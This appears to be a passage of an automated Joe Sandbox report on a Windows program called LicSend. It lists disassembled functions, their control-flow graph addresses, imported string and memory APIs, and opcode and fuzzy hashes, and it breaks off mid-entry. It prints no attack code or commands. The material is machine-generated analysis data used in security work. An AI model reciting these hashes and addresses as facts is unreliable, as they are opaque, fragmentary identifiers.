                                                                                                    • Opcode ID: 86a952fe54ebb8fdbe6481a5c7472628de9d57096e7574fd9aad0c6cb33b5af6
                                                                                                    • Instruction ID: ea8b034a85f691b119f5e10b042fbd04c1f2903341d9d60133ff416262e15ec7
                                                                                                    • Opcode Fuzzy Hash: 86a952fe54ebb8fdbe6481a5c7472628de9d57096e7574fd9aad0c6cb33b5af6
                                                                                                    • Instruction Fuzzy Hash: D0A2A021A1EB8185EB91AB29E4053EDE7A0FB85B84FC44036DACD67796EF7CD140C760
                                                                                                    Function 00007FF7D3B976C0 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 387COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1143 7ff7d3b976c0-7ff7d3b9776f call 7ff7d3b9aae0 call 7ff7d3b99646 call 7ff7d3b995a7 1150 7ff7d3b97d20-7ff7d3b97d38 call 7ff7d3b99646 1143->1150 1151 7ff7d3b97775-7ff7d3b97781 1143->1151 1154 7ff7d3b97d3d-7ff7d3b97d3f 1150->1154 1152 7ff7d3b97789-7ff7d3b97802 call 7ff7d3b995f5 memset call 7ff7d3b9ac70 1151->1152 1163 7ff7d3b97ca8-7ff7d3b97cdf call 7ff7d3b9ac70 call 7ff7d3b9a3b0 1152->1163 1164 7ff7d3b97808-7ff7d3b97814 call 7ff7d3b9ac70 1152->1164 1154->1151 1156 7ff7d3b97d45-7ff7d3b97d70 1154->1156 1159 7ff7d3b97d91-7ff7d3b97da2 1156->1159 1161 7ff7d3b97da4-7ff7d3b97dce call 7ff7d3b9ac70 * 2 1159->1161 1162 7ff7d3b97d78-7ff7d3b97d7c 1159->1162 1180 7ff7d3b97dd0-7ff7d3b97dff call 7ff7d3b9a3b0 1161->1180 1181 7ff7d3b97e04-7ff7d3b97e08 1161->1181 1165 7ff7d3b97ef0-7ff7d3b97f00 1162->1165 1166 7ff7d3b97d82-7ff7d3b97d8b 1162->1166 1187 7ff7d3b97ce8-7ff7d3b97d08 1163->1187 1174 7ff7d3b97816-7ff7d3b97827 1164->1174 1175 7ff7d3b9782d-7ff7d3b97849 call 7ff7d3b985b0 wcslen 1164->1175 1165->1151 1166->1159 1166->1165 1174->1175 1186 7ff7d3b9784f-7ff7d3b97898 memset wcscpy wcslen 1175->1186 1175->1187 1180->1181 1184 7ff7d3b97e0a-7ff7d3b97e29 1181->1184 1185 7ff7d3b97e2e-7ff7d3b97e3e wcsncmp 1181->1185 1184->1185 1185->1162 1188 7ff7d3b97e44-7ff7d3b97e67 1185->1188 1190 7ff7d3b97d0e-7ff7d3b97d16 1186->1190 1191 7ff7d3b9789e-7ff7d3b978ce memset wcscpy wcslen 1186->1191 1187->1190 1187->1191 1188->1151 1189 7ff7d3b97e6d-7ff7d3b97ed2 call 7ff7d3b995da 1188->1189 1189->1152 1196 7ff7d3b97ed8-7ff7d3b97ee4 1189->1196 1193 7ff7d3b978d2-7ff7d3b97ca4 wcslen * 3 call 7ff7d3b995a7 * 2 call 7ff7d3b995e9 call 7ff7d3b995c2 * 2 1190->1193 1191->1193 1196->1152
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$memset$wcscpy$wcsncmp
                                                                                                    • String ID: 0$X$`
                                                                                                    • API String ID: 4021896446-2527496196
                                                                                                    • Opcode ID: 71c2dd0d9b89cba3038043aacf0093748c804883baea2e2f1110428d541eeabc
                                                                                                    • Instruction ID: cba63555bd454f7f0f242f7b50572e76091f9bac122fcfd76029e5a06539a59b
                                                                                                    • Opcode Fuzzy Hash: 71c2dd0d9b89cba3038043aacf0093748c804883baea2e2f1110428d541eeabc
                                                                                                    • Instruction Fuzzy Hash: C1128122619BC185E3A09F25E4003AEF7A0FB85794F844226DEDC67B99DF3CD144CB60
                                                                                                    Function 00007FF7D3B97285 Relevance: 5.2, APIs: 4, Instructions: 167stringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1307 7ff7d3b97285-7ff7d3b97291 call 7ff7d3b91e40 1310 7ff7d3b97293-7ff7d3b97296 call 7ff7d3b916f0 1307->1310 1311 7ff7d3b9729b-7ff7d3b972ac call 7ff7d3b91d90 1307->1311 1310->1311 1315 7ff7d3b972e1-7ff7d3b972f2 call 7ff7d3b91cf0 1311->1315 1316 7ff7d3b972ae-7ff7d3b972ba 1311->1316 1321 7ff7d3b97321-7ff7d3b97335 call 7ff7d3b91c40 1315->1321 1322 7ff7d3b972f4-7ff7d3b972fe 1315->1322 1317 7ff7d3b972c0-7ff7d3b972db 1316->1317 1317->1317 1319 7ff7d3b972dd 1317->1319 1319->1315 1327 7ff7d3b9733f-7ff7d3b97350 call 7ff7d3b91b90 1321->1327 1328 7ff7d3b97337-7ff7d3b9733a call 7ff7d3b91810 1321->1328 1323 7ff7d3b97300-7ff7d3b9731b 1322->1323 1323->1323 1325 7ff7d3b9731d 1323->1325 1325->1321 1332 7ff7d3b97381-7ff7d3b97392 call 7ff7d3b91ac0 1327->1332 1333 7ff7d3b97352-7ff7d3b9735f 1327->1333 1328->1327 1338 7ff7d3b973c1-7ff7d3b973d5 call 7ff7d3b91a20 1332->1338 1339 7ff7d3b97394-7ff7d3b9739e 1332->1339 1334 7ff7d3b97360-7ff7d3b9737b 1333->1334 1334->1334 1336 7ff7d3b9737d 1334->1336 1336->1332 1344 7ff7d3b973df-7ff7d3b973f0 call 7ff7d3b91970 1338->1344 1345 7ff7d3b973d7-7ff7d3b973da call 7ff7d3b91890 1338->1345 1340 7ff7d3b973a0-7ff7d3b973bb 1339->1340 1340->1340 1342 7ff7d3b973bd 1340->1342 1342->1338 1349 7ff7d3b97421-7ff7d3b97435 call 7ff7d3b918d0 1344->1349 1350 7ff7d3b973f2-7ff7d3b973fe 1344->1350 1345->1344 1355 7ff7d3b976a4-7ff7d3b976a7 call 7ff7d3b91890 1349->1355 1356 7ff7d3b9743b-7ff7d3b9745e 1349->1356 1351 7ff7d3b97400-7ff7d3b9741b 1350->1351 1351->1351 1353 7ff7d3b9741d 1351->1353 1353->1349 1361 7ff7d3b976ac 1355->1361 1357 7ff7d3b9746d-7ff7d3b9747e strstr 1356->1357 1359 7ff7d3b97460-7ff7d3b97467 1357->1359 1360 7ff7d3b97480-7ff7d3b974a2 call 7ff7d3b9ac70 * 2 1357->1360 1359->1357 1362 7ff7d3b97511-7ff7d3b97523 call 7ff7d3b98c10 1359->1362 1369 7ff7d3b974a4-7ff7d3b974c3 call 7ff7d3b9a3b0 1360->1369 1370 7ff7d3b974c8-7ff7d3b974cc 1360->1370 1361->1361 1367 7ff7d3b97528 1362->1367 1367->1355 1369->1370 1372 7ff7d3b974dd-7ff7d3b9750b strcat * 2 strlen 1370->1372 1373 7ff7d3b974ce-7ff7d3b974da 1370->1373 1372->1357 1372->1362 1373->1372
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strcat$strlenstrstr
                                                                                                    • String ID:
                                                                                                    • API String ID: 3991645906-0
                                                                                                    • Opcode ID: 31a81c80cfb641bf43eedc5a389915bdc02a8eb2c7a98189b304857904575c5e
                                                                                                    • Instruction ID: 34b274374ffcb91d2bbefbf9ff5113a1769942919d4dd88a95b409be31a70de8
                                                                                                    • Opcode Fuzzy Hash: 31a81c80cfb641bf43eedc5a389915bdc02a8eb2c7a98189b304857904575c5e
                                                                                                    • Instruction Fuzzy Hash: B061D662E0E68241FBA5E72594153BDEEE1EB8A780FC84036DAC927787DE6CD045C371
                                                                                                    Function 00007FF7D3B9AD2C Relevance: 9.1, APIs: 6, Instructions: 82sleepsynchronizationCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1206 7ff7d3b9ad2c-7ff7d3b9ad36 1207 7ff7d3b9ae68-7ff7d3b9ae70 1206->1207 1208 7ff7d3b9ad3c-7ff7d3b9ad44 1206->1208 1211 7ff7d3b9ae72-7ff7d3b9ae8a 1207->1211 1212 7ff7d3b9ae21-7ff7d3b9ae26 call 7ff7d3b9ac10 1207->1212 1209 7ff7d3b9ad4a-7ff7d3b9ad51 1208->1209 1210 7ff7d3b9ae9c-7ff7d3b9aeb0 WaitForSingleObject 1208->1210 1214 7ff7d3b9ae47-7ff7d3b9ae5d 1209->1214 1215 7ff7d3b9ad57-7ff7d3b9ad5b 1209->1215 1210->1209 1213 7ff7d3b9aeb6-7ff7d3b9aebe 1210->1213 1217 7ff7d3b9ae30-7ff7d3b9ae34 1211->1217 1218 7ff7d3b9ae8c 1211->1218 1212->1217 1213->1209 1219 7ff7d3b9acb1-7ff7d3b9acd9 GetLastError TlsGetValue SetLastError 1215->1219 1220 7ff7d3b9ad61-7ff7d3b9ad69 1215->1220 1217->1208 1222 7ff7d3b9ae3a-7ff7d3b9ae41 1217->1222 1223 7ff7d3b9ae90-7ff7d3b9ae98 Sleep 1218->1223 1227 7ff7d3b9ad90-7ff7d3b9adaa calloc 1219->1227 1228 7ff7d3b9acdf-7ff7d3b9ace5 1219->1228 1220->1219 1224 7ff7d3b9ad6f-7ff7d3b9ad84 ReleaseSemaphore 1220->1224 1222->1214 1222->1219 1223->1223 1226 7ff7d3b9ae9a 1223->1226 1224->1219 1226->1217 1231 7ff7d3b9adb0 1227->1231 1232 7ff7d3b9aec3-7ff7d3b9aed3 abort 1227->1232 1229 7ff7d3b9add8-7ff7d3b9adff call 7ff7d3b9fea8 1228->1229 1230 7ff7d3b9aceb-7ff7d3b9acf7 1228->1230 1229->1232 1244 7ff7d3b9ae05-7ff7d3b9ae1f memset 1229->1244 1235 7ff7d3b9ac97-7ff7d3b9aca3 1230->1235 1236 7ff7d3b9acf9-7ff7d3b9acfc call 7ff7d3b9ab70 1230->1236 1237 7ff7d3b9adb3-7ff7d3b9adc4 TlsSetValue 1231->1237 1233 7ff7d3b9aee0-7ff7d3b9aee4 1232->1233 1234 7ff7d3b9aed5-7ff7d3b9aed8 1232->1234 1239 7ff7d3b9aee6 1233->1239 1240 7ff7d3b9aeea-7ff7d3b9aeed 1233->1240 1234->1233 1247 7ff7d3b9ad01-7ff7d3b9ad06 1236->1247 1237->1230 1242 7ff7d3b9adca-7ff7d3b9adcd 1237->1242 1239->1240 1245 7ff7d3b9aeef-7ff7d3b9aef2 1240->1245 1246 7ff7d3b9aef4 1240->1246 1242->1230 1244->1237 1245->1246 1248 7ff7d3b9aef8-7ff7d3b9aefc 1245->1248 1247->1235
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$ObjectReleaseSemaphoreSingleSleepValueWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 4052324419-0
                                                                                                    • Opcode ID: 098b9e2a649740763700a8127ed266a05f9c8c4706f1f0d0dabdc3d09da33519
                                                                                                    • Instruction ID: e0f5b795cbc4edf2eee88ec7a808e05728a74ef8f1ae7bba7d4c0a128b9df637
                                                                                                    • Opcode Fuzzy Hash: 098b9e2a649740763700a8127ed266a05f9c8c4706f1f0d0dabdc3d09da33519
                                                                                                    • Instruction Fuzzy Hash: 93314C31E1A6038AE6D5BB62A80463DE3A1AF44B45FD8403BCD5D27690CF3DE945CBB0
                                                                                                    Function 00007FF7D3B9ACCB Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1250 7ff7d3b9accb-7ff7d3b9acd9 SetLastError 1251 7ff7d3b9ad90-7ff7d3b9adaa calloc 1250->1251 1252 7ff7d3b9acdf-7ff7d3b9ace5 1250->1252 1255 7ff7d3b9adb0 1251->1255 1256 7ff7d3b9aec3-7ff7d3b9aed3 abort 1251->1256 1253 7ff7d3b9add8-7ff7d3b9adff call 7ff7d3b9fea8 1252->1253 1254 7ff7d3b9aceb-7ff7d3b9acf7 1252->1254 1253->1256 1268 7ff7d3b9ae05-7ff7d3b9ae1f memset 1253->1268 1259 7ff7d3b9ac97-7ff7d3b9aca3 1254->1259 1260 7ff7d3b9acf9-7ff7d3b9ad06 call 7ff7d3b9ab70 1254->1260 1261 7ff7d3b9adb3-7ff7d3b9adc4 TlsSetValue 1255->1261 1257 7ff7d3b9aee0-7ff7d3b9aee4 1256->1257 1258 7ff7d3b9aed5-7ff7d3b9aed8 1256->1258 1263 7ff7d3b9aee6 1257->1263 1264 7ff7d3b9aeea-7ff7d3b9aeed 1257->1264 1258->1257 1260->1259 1261->1254 1266 7ff7d3b9adca-7ff7d3b9adcd 1261->1266 1263->1264 1269 7ff7d3b9aeef-7ff7d3b9aef2 1264->1269 1270 7ff7d3b9aef4 1264->1270 1266->1254 1268->1261 1269->1270 1272 7ff7d3b9aef8-7ff7d3b9aefc 1269->1272
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValuecallocmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 115352733-0
                                                                                                    • Opcode ID: 674e6714b28f29a72f36b74423ec53ee68051ed7681bef0e89a3bcbb63d28129
                                                                                                    • Instruction ID: 08a19772137c937501833bf80c16d35d511391777fc66cda3ad742fe80bf87d3
                                                                                                    • Opcode Fuzzy Hash: 674e6714b28f29a72f36b74423ec53ee68051ed7681bef0e89a3bcbb63d28129
                                                                                                    • Instruction Fuzzy Hash: 39219522A0BA4685EAD6BB14D44477CE3A5EF44B84FE58037C98D27B91DE3CE945C370
                                                                                                    Function 00007FF7D3B9AB70 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1274 7ff7d3b9ab70-7ff7d3b9ab85 1275 7ff7d3b9abc0-7ff7d3b9abcd malloc 1274->1275 1276 7ff7d3b9ab87-7ff7d3b9ab93 malloc 1274->1276 1277 7ff7d3b9ac02-7ff7d3b9ac08 abort 1275->1277 1279 7ff7d3b9abcf-7ff7d3b9abe8 1275->1279 1276->1277 1278 7ff7d3b9ab95-7ff7d3b9aba6 1276->1278 1280 7ff7d3b9aba8-7ff7d3b9abbd memcpy 1278->1280 1281 7ff7d3b9abea-7ff7d3b9ac01 memset 1278->1281 1279->1280 1279->1281
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: malloc$abortmemcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4174897659-0
                                                                                                    • Opcode ID: f60c9ccde6cc24ebbe6c25cd49c6c31d230bca9fadfba88e236426f03def9ec8
                                                                                                    • Instruction ID: eca9cb77334ebad457a83d178a72027143e9bbfc867d8b5d8ad196fe805a379b
                                                                                                    • Opcode Fuzzy Hash: f60c9ccde6cc24ebbe6c25cd49c6c31d230bca9fadfba88e236426f03def9ec8
                                                                                                    • Instruction Fuzzy Hash: 6901C263B06A4840EAC4AB56E4015EDE761EB94FD0FC48132CE4C27382EE38E981C370
                                                                                                    Function 00007FF7D3B91291 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1282 7ff7d3b91291-7ff7d3b91318 malloc 1285 7ff7d3b913b5-7ff7d3b913fc call 7ff7d3b99710 call 7ff7d3b95260 1282->1285 1286 7ff7d3b9131e-7ff7d3b9132c 1282->1286 1299 7ff7d3b91402-7ff7d3b9140a 1285->1299 1300 7ff7d3b914ce-7ff7d3b914d6 call 7ff7d3b9fe58 1285->1300 1287 7ff7d3b91383-7ff7d3b91388 1286->1287 1288 7ff7d3b9132e 1286->1288 1291 7ff7d3b91351-7ff7d3b91374 malloc memcpy 1287->1291 1290 7ff7d3b91330-7ff7d3b91336 1288->1290 1293 7ff7d3b91340-7ff7d3b9134b 1290->1293 1294 7ff7d3b913b0 1291->1294 1295 7ff7d3b91376-7ff7d3b91381 1291->1295 1293->1293 1298 7ff7d3b9134d 1293->1298 1294->1285 1295->1287 1295->1290 1298->1291 1301 7ff7d3b91490-7ff7d3b914aa call 7ff7d3b9fe18 1299->1301 1302 7ff7d3b91410-7ff7d3b9141f 1299->1302
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: malloc$memcpy
                                                                                                    • String ID: r>
                                                                                                    • API String ID: 3800483350-945394243
                                                                                                    • Opcode ID: 1cb63d5b23db35d8ba80ed2079e12d0303c5da2bdf329d9fda7d7100d3d1e76f
                                                                                                    • Instruction ID: 5b0cd99061fc6969a3b5e211921c0190832162dee86389ca9ae1e9a0a9de5333
                                                                                                    • Opcode Fuzzy Hash: 1cb63d5b23db35d8ba80ed2079e12d0303c5da2bdf329d9fda7d7100d3d1e76f
                                                                                                    • Instruction Fuzzy Hash: BC319926E1A60689EAD1AF41E4403BDE760BB4CB91FC44137CA4D23396DF3CA894E770
                                                                                                    Function 00007FF7D3B9A540 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Value$Free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2242701089-0
                                                                                                    • Opcode ID: 75fbf50a7cce4f1bb34b63ad973ab3266364df8118ae08a2d51d38ba088dce60
                                                                                                    • Instruction ID: a5010e2bc993780b310f3c458a4fdb4f288961facdfda5884a23a7dd5756628c
                                                                                                    • Opcode Fuzzy Hash: 75fbf50a7cce4f1bb34b63ad973ab3266364df8118ae08a2d51d38ba088dce60
                                                                                                    • Instruction Fuzzy Hash: 2FF01C28E2954786EA94BBA1EC5103DF762BF98314FC44036C84D22274DE3CE615CFB0
                                                                                                    Function 00007FF7D3B98800 Relevance: 3.8, APIs: 3, Instructions: 71COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
